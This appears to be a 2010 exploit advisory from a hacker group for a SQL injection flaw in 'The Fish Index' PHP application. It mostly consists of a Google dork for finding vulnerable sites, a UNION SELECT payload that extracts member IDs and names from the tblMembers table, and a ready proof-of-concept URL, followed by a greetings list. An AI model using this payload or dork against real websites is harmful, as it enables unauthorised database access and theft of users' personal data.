************************************************************************* , | ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . , |---| | | | | |---' | | | |---' | | | | `---' `---| `---' `---' ` `---' ` `---' `---`--- ` `---' ************************************************************************* [V] Member ID The Fish Index PHP SQL Injection Vulnerability --==[ Author ]==-- [+] Author: v4lc0m87 [+] Contact : valcom87[at]gmail[dot]com [+] Group : INDONESIAN CYBER [+] Site: http://indonesian-cyber.org/ [+] Date: June, 3-2010 [INDONESIA] ************************************************************************* --==[ Details ]==-- [+] Vulnerable: SQL Injection [+] Google Dork : inurl:index.php?myPlantId= +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [-] Exploit : [+] 9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers-- [-] Remote SQLi p0c : [+] http://127.0.0.1/[path]/index.php?myPlantId=9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers-- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | IDC [V] Greetz : SaruKusai, MarilynMesum (smoga jadi pasangan sejati wkwkwkwk) Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601) Bocah tua nakal (mbah l4mpor,awchoy) flyff666 cruz3N petimati spykit v3n0m uzanc kokoh wisdom (di FB koq curhat mlu sih koh :p) blue screen, skutengboy (kalian pasangan yg serasi juga loh, jikakakakakk) [K]urabu[S]aru [RnR] cO2 community and y0u !!
体验盒子
